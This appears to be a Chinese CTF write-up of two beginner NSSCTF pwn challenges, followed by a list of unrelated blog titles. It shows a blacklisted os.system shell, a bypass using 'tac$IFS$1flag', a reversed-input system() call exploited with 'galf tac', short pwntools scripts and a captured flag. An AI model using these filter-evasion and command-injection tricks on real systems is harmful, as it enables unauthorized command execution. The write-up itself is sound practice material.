NSSCTFpwn刷题

[SWPUCTF 2021 新生赛]nc签到

打开附件里面内容

复制代码
import os

art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")

blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

blacklist是黑名单的意思

也就是说里面的内容都被禁了,所以我们需要绕过

cat可以用tac来代替

空格' ' 可以用 IFS1 代替,也就是tacIFS1flag

编写exp

复制代码
from pwn import*
p = remote('node4.anna.nssctf.cn',28808)
data = p.recv() 
p.sendline('tac$IFS$1flag')
p.interactive()

[NISACTF 2022]ReorPwn?

查看一下附件

复制代码
checksec 1

64位的,ok

找到main函数,F5

复制代码
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("evcexe ot tnaw uoy tahw em lleT:");
  gets(a);
  fun(a);
  system(a);
  return 0;
}

evcexe ot tnaw uoy tahw em lleT

Tell me what you want to execve

告诉我你想要执行什么

双击fun

双击system

分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。

直接galf tac得到flag

编写exp

复制代码
from pwn import*
p = remote("node4.anna.nssctf.cn",28447)
p.sendline('galf tac')
p.interactive()

NSSCTF{ee0c2423-7c37-4e3a-a969-430fbaf645d2}

相关推荐
花嫁代二娃4 小时前
Linux:环境变量
linux
胚芽鞘6814 小时前
关于java项目中maven的理解
java·数据库·maven
nbsaas-boot5 小时前
Java 正则表达式白皮书:语法详解、工程实践与常用表达式库
开发语言·python·mysql
岁忧5 小时前
(LeetCode 面试经典 150 题 ) 11. 盛最多水的容器 (贪心+双指针)
java·c++·算法·leetcode·面试·go
chao_7895 小时前
二分查找篇——搜索旋转排序数组【LeetCode】两次二分查找
开发语言·数据结构·python·算法·leetcode
CJi0NG5 小时前
【自用】JavaSE--算法、正则表达式、异常
java
风无雨5 小时前
GO 启动 简单服务
开发语言·后端·golang
Hellyc5 小时前
用户查询优惠券之缓存击穿
java·redis·缓存
斯普信专业组5 小时前
Go语言包管理完全指南:从基础到最佳实践
开发语言·后端·golang
今天又在摸鱼6 小时前
Maven
java·maven